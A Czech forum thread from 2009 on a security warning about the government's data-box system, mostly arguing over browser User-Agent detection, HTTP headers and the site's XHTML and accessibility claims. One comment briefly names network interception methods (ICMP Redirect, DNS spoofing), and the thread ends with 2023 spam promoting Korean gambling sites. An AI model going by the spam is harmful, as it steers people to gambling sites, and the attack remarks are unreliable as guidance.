    Růžové lži.
    Grunt avatar 4.7.2009 12:58 Grunt | skóre: 23 | blog: Expresivní zabručení | Lanžhot
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    A pokud už to čirou náhodou nejde na druhé síťové vrstvě tak hop o vrstvu výše na ICMP Redirect. Ještě jsem nezažil systém, který by nevyhověl. Vždycky se najde něco.
    Na co 64-bitů když to jde i s jedním? | 80.78.148.5 | Hack (for) free or Die Hard!
    4.7.2009 13:56 Filip Jirsák | skóre: 68 | blog: Fa & Bi
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    Zrovna tento konkrétní popis vyžaduje stejnou síť. Ale obdobně to lze udělat i s přístupem ke kterémukoli routeru po cestě, další možnost je třeba podvrhnout DNS odpověď (to můžete teoreticky zvládnout u počítače na druhém konci světa)…
    vlastikroot avatar 4.7.2009 13:17 vlastikroot | skóre: 24 | blog: vlastikovo | Milevsko
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    LOL
    We will destroys the Christian's legion ... and the cross, will be inverted
    Jendа avatar 4.7.2009 13:37 Jendа | skóre: 78 | blog: Jenda | JO70FB
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    A fakt se hlásí jako Firefox? V Debianu se třeba hlásí jako Iceweasel a v Archu Minefield (IMHO).
    vlastikroot avatar 4.7.2009 13:47 vlastikroot | skóre: 24 | blog: vlastikovo | Milevsko
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    JJ minefield , ale jde o to ze k cemu je tam pak takova detekce ?? To si snad nemuze nikdo normalni dovolit :-D
    We will destroys the Christian's legion ... and the cross, will be inverted
    4.7.2009 13:57 Ladicek | skóre: 28 | blog: variace | Havlíčkův brod
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    Úplně klidně. Kdyby teda byli co k čemu, detekují slovo Gecko :-)

    Když jsem jednou dočasně musel zobrazovat uživatelům prohlížečů postavených na Gecku upozornění na nefunkčnost WYSIWYG editace HTML, detekoval jsem "Gecko/1.8.blablabla" (už nevím, od které verze přesně to bylo), ale v upozornění jsem bez skrupulí použil slovo Firefox. Koho zajímá jakési Gecko a proč mluvit o jakési Mozille – technici vědí a u netechniků nějaká jiná Gecko-aplikace prakticky nehrozí.
    Ještě na tom nejsem tak špatně, abych četl Viewegha.
    thingie avatar 4.7.2009 13:59 thingie | skóre: 8
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    Konqueror se pak třeba hlásí jako „like Gecko“, například. Tak co s tím. A přitom je dost odlišný. Ty identifikace prohlížečů jsou asi strašně nanic, nejlíp asi nepoužívat to vůbec, zdá se.
    Růžové lži.
    4.7.2009 14:04 12345 | skóre: 41 | blog:
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění

    Prosím tě, kde žiješ? Copak nevíš, co o tom kážou odborníci na prohlížeče? :-D

    One of the most common operations performed in a Web page is to detect the browser type and version.
    4.7.2009 14:12 Ladicek | skóre: 28 | blog: variace | Havlíčkův brod
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    Jenže ona to dost možná bude pravda, proč by jinak už od dřevních dob webu velká většina prohlížečů začínala svůj UA řetězec "Mozilla/4.0"? :-)
    Ještě na tom nejsem tak špatně, abych četl Viewegha.
    4.7.2009 14:09 Ladicek | skóre: 28 | blog: variace | Havlíčkův brod
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    Jo, no, ale Gecko/X.Y.Z.W mají snad jenom opravdové Gecko-věci. UA řetězec by byla super věc, kdyby to prohlížeče dělaly pořádně (už i Opera musela slevit, s tou verzí 10…), ale i v dnešním stavu se nějaká, byť třeba hrubá, detekce dělat dá.

    Druhá věc je, jak se s výsledkem takové detekce zachází. Zablokovat uživatele nerozpoznaného prohlížeče je zločin, za který by měl autor viset za koule v průtrži mračen a do očí by mu měli zapíchat špendlíky. Ale s posíláním upravených/opravených verzí pro konkrétní prohlížeče a nějakého defaultu pro všechny ostatní, pokud není zbytí, naprosto nemám problém. Ale to už jsme off topic.
    Ještě na tom nejsem tak špatně, abych četl Viewegha.
    thingie avatar 4.7.2009 14:39 thingie | skóre: 8
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    On může mít kdokoliv cokoliv, žejo. RFC 2616 se k tomu vyjadřuje jenom orientačně, a i kdyby, HTTP je stejně víc zvykové právo, než nějaký přesně specifikovaný protokol, tak je to úplně jedno. Nicméně pokud se odpověď výrazně liší podle user-agent v hlavičce, tak je to prostě problém, a dít by se to nemělo. Neřeknu odlišný CSS styl, nebo nějaké drobnosti, ale úplně jiná odpověď, to je prostě katastrofa. Vyrábí se tím šílený zmatek, odpovědi se stanou nepředvídatelnými, a vůbec se to nedá označit za pozitivní jev.
    Růžové lži.
    4.7.2009 16:26 Filip Jirsák | skóre: 68 | blog: Fa & Bi
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    HTTP je stejně víc zvykové právo, než nějaký přesně specifikovaný protokol
    Opravdu HTTP? Nenapadá mne nic, co by se dnes masově při HTTP komunikaci používalo, a bylo to v rozporu se specifikací HTTP nebo v ní nebylo uvedeno.
    Nicméně pokud se odpověď výrazně liší podle user-agent v hlavičce, tak je to prostě problém, a dít by se to nemělo.
    Specifikace protokolu HTTP na to má jiný názor a dokonce specifikuje hlavičku Vary, na základě které se určí, které hlavičky HTTP dotazu ovlivňují výběr odpovědi.
    thingie avatar 4.7.2009 16:38 thingie | skóre: 8
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    Zvykové právo má ovšem názor takový, že Vary se pro tohle stejně použít nedá, protože stejně neexistuje žádný dohodnutý způsob jak si takto sdělit, že jinému prohlížeči (jakému, jak) něco řeknu, co jemu ne. A prohlížeč s touhle informací nemá moc jak naložit, ani to vysvětlit uživateli. Konečně, co taky čekat od mechanismu, který je určen pro proxy a cache.
    Růžové lži.
    4.7.2009 18:27 Filip Jirsák | skóre: 68 | blog: Fa & Bi
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    Odpověděl jste si sám. Ta hlavička je určená pro proxy a cache, prohlížeč ji nepotřebuje. Onen dohodnutý způsob, který podle vás neexistuje, je jazyk český (na českých webech), kterým se do HTML stránky (pokud jde o HTML stránku) napíše, že váš prohlížeč neumí to a to a pokud to potřebujete, můžete použít například prohlížeč X nebo Y. Pokud to však server detekuje špatně, není to problém protokolu ani prohlížeče, ale problém autora aplikace. Ale před neschopností autora vás samozřejmě žádný protokol neochrání.
    David Watzke avatar 4.7.2009 16:43 David Watzke | skóre: 74 | blog: Blog... | Praha
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    Jojo, tohle je chlípnost, prudí to na kdejakým webu. Řešením je jít do about:config a přidat si tam novou předvolbu (řetězec) general.useragent.override s hodnotou např.
    Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1) Gecko/20090702 Firefox/3.5
    “Being honest may not get you a lot of friends but it’ll always get you the right ones” ―John Lennon
    vlastikroot avatar 4.7.2009 20:45 vlastikroot | skóre: 24 | blog: vlastikovo | Milevsko
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    Vim ze si muzu zmenit UA, ale neni to spis jen workaround ? Chci aby bylo videt co pouzivam, ze pouzivam treba Gran Paradiso (jedina vec podle ktere je poznat ze mam archa) nebo Konqueror, nez Firefox. Treba moootools ma detekci browseru, ale jen na zaklade funkci, ne user agentu. Takze muzu zjistit IE, a pritom to IE vubec byt nemusi, ale je stejne nefunkcni. Za to ze si nekdo vubec dovoli davat detekci podle user agentu a ostatnim znemoznit funkcnost, by mel prijit o svoje pracovni misto. Varovani beru, ale naprosty znefunkcneni stranky kvuli jiny identifikaci browseru je fakt silny kafe.
    We will destroys the Christian's legion ... and the cross, will be inverted
    Grunt avatar 4.7.2009 21:00 Grunt | skóre: 23 | blog: Expresivní zabručení | Lanžhot
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    Za to ze si nekdo vubec dovoli davat detekci podle user agentu a ostatnim znemoznit funkcnost, by mel prijit o svoje pracovni misto. Varovani beru, ale naprosty znefunkcneni stranky kvuli jiny identifikaci browseru je fakt silny kafe.
    Samotná Mozilla na tom nebyla o moc lépe.
    Na co 64-bitů když to jde i s jedním? | 80.78.148.5 | Hack (for) free or Die Hard!
    vlastikroot avatar 4.7.2009 23:34 vlastikroot | skóre: 24 | blog: vlastikovo | Milevsko
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    Technologicka dema jsou trochu neco jineho nez projekt za 900M :-D
    We will destroys the Christian's legion ... and the cross, will be inverted
    Grunt avatar 5.7.2009 10:37 Grunt | skóre: 23 | blog: Expresivní zabručení | Lanžhot
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    Krom toho že si někdo pravděpodobně koupí novou vilu a pár aut, v čem?
    Na co 64-bitů když to jde i s jedním? | 80.78.148.5 | Hack (for) free or Die Hard!
    Salamek avatar 5.7.2009 12:16 Salamek | skóre: 22 | blog: salamovo
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    no spíš pár vilek i s ostrůvkem a nějaky ty auta
    Skutečně nemám v plánu zničit Microsoft. Bude to jen zcela neúmyslný vedlejší efekt.
    vlastikroot avatar 5.7.2009 12:42 vlastikroot | skóre: 24 | blog: vlastikovo | Milevsko
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    S tebou se neda diskutovat :-D vzdycky mas lepsi pravdu nez ja :-D
    We will destroys the Christian's legion ... and the cross, will be inverted
    stativ avatar 5.7.2009 09:14 stativ | skóre: 54 | blog: SlaNé roury
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    Sakra, abych Shiretoko zaměnil za Firefox ;-)
    Ať sežeru elfa i s chlupama!!! ljirkovsky.wordpress.com stativ.tk
    Jendа avatar 4.7.2009 19:45 Jendа | skóre: 78 | blog: Jenda | JO70FB
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    Omluvte plánovanou odstávku informačního systému datových schránek od 4. 7. do 5. 7.
    Muhehe, čtyři dny to jelo a už si naplánovali odstávku :-)
    Jendа avatar 4.7.2009 19:47 Jendа | skóre: 78 | blog: Jenda | JO70FB
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    Omlouváme se všem uživatelům Datových schránek, v současné době probíhá plánovaná odstávka, z důvodů prací spojených s náběhem systému. Práce se týkají implementace změn v systému Datových schránek, které vyplývají z Novely zákona 300/2008 Sb. Probíhá rovněž plánované zátěžové testování systému a činnosti, které souvisí s další etapou bezpečnostního auditu systému Datových schránek.
    Že by se ledy hnuly?
    Grunt avatar 4.7.2009 20:34 Grunt | skóre: 23 | blog: Expresivní zabručení | Lanžhot
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    Takže jako žádná akční reportáž na TV Nova?
    Na co 64-bitů když to jde i s jedním? | 80.78.148.5 | Hack (for) free or Die Hard!
    Jendа avatar 4.7.2009 20:36 Jendа | skóre: 78 | blog: Jenda | JO70FB
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    Nevím, TV moc nesleduji s zprávy na Nově už vůbec ne... Nebylo tam něco?
    Jendа avatar 6.7.2009 14:49 Jendа | skóre: 78 | blog: Jenda | JO70FB
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    Nehnuly... DS jsou zpět online a pořád to tam je.
    Salamek avatar 5.7.2009 02:51 Salamek | skóre: 22 | blog: salamovo
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    S validitou se taky moc nesrali , sice to nejsou hrubky ale na tak drahej projekt by to mohli prasit alespon mín než já , když jde navíc o tak chudou stránku Invalidní
    Skutečně nemám v plánu zničit Microsoft. Bude to jen zcela neúmyslný vedlejší efekt.
    Salamek avatar 5.7.2009 02:55 Salamek | skóre: 22 | blog: salamovo
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    stojí za to si přečíst : http://www.czebox.cz/static/pages/prohlaseni.html
    hlavně část:
    Při tvorbě stránek byl použit značkovací jazyk HTML podle specifikace XHTML 1.0 Strict a bylo dbáno na dodržení syntaktické i sémantické správnosti.(ano to vidíme )
    a
    Stránky Informačního systému datových schránek byly vytvořeny s maximální snahou vyhovět všem závazným předpisům podle zákona č. 365/2001 Sb., vyhlášky 64/2008 Sb. a související metodické příručky. Splňují tak důležité zásady přístupnosti podle metodiky Blind Friendly Web (BFW) i Web Content Accessibility Guidlines (WCAG).
    Skutečně nemám v plánu zničit Microsoft. Bude to jen zcela neúmyslný vedlejší efekt.
    xkucf03 avatar 5.7.2009 10:42 xkucf03 | skóre: 49 | blog: xkucf03
    Rozbalit Rozbalit vše Snaha, luseři a BFU.

    Jenže „maximální snaha“ neříká nic o tom, zda se výsledku podařilo dosáhnout – píše-li to luser, ani maximální snažení nebude korunováno XHTML validitou :-)

    Ad BFW – existuje i něco jako BFU Friendly Web? :-D

    Mám rád, když se lidé přou, znamená to, že vědí, co dělají, a že mají směr. Frantovo.cz, SQL-DK, Relational pipes
    Jendа avatar 5.7.2009 12:28 Jendа | skóre: 78 | blog: Jenda | JO70FB
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    Neřekl bych, že je to nějak extrémně přístupné (kvůli závislosti na Filleru) ;-).
    Salamek avatar 5.7.2009 13:20 Salamek | skóre: 22 | blog: salamovo
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    oni tma nic o 602 nemelou v tom prohlášení melou tma jen o PDF ,Widle formatu Office a ODF
    Skutečně nemám v plánu zničit Microsoft. Bude to jen zcela neúmyslný vedlejší efekt.
    22.6.2023 12:19 Rank Xone
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    It is great, yet take a gander at the data at this address. แทงไฮโล
    26.6.2023 13:04 Adilkhatri
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    검증된 파워볼사이트 를 찾으신다면 eos파워볼사이트 가 있는 파워볼사이트추천 에서 파워볼 을 즐기시길 바랍니다. 5년 이상 운영된 메이저업체 이며 지금까지 많은분들께 사랑받은 안전한파워볼사이트 입니다. 안전한파워볼사이트
    29.6.2023 09:47 Adilkhatri
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    Amid this site, you will see this shape, I very suggest you take in this audit. 먹튀검증사이트
    27.7.2023 08:22 메이저사이트
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    This is a great post. I like this topic.This site has lots of advantage.I found many interesting things from this site. It helps me in many ways.Thanks for posting this again.메이저사이트
    14.8.2023 07:32 먹튀검증
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    I value your work to write this type of great short article. I will certainly share this article with my pals as it comprises of beneficial help and advice for all. 먹튀검증
    5.9.2023 05:36 토토사이트
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    This is my first time pay a quick visit at here and i am really happy to read everthing at one place! 토토사이트
    20.9.2023 08:10 토토사이트
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    Articles usually are not a thing I ordinarily take time to read, but I am glad I took the time to read this 1. Your views are well-said, very informative and I shared your report with friends. 토토사이트
    9.11.2023 02:53 메이저사이트
    Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
    Thanks for the blog loaded with so many information. Stopping by your blog helped me to get what I was looking for. 메이저사이트

    Založit nové vláknoNahoru

    ISSN 1214-1267   www.czech-server.cz
    © 1999-2015 Nitemedia s. r. o. Všechna práva vyhrazena.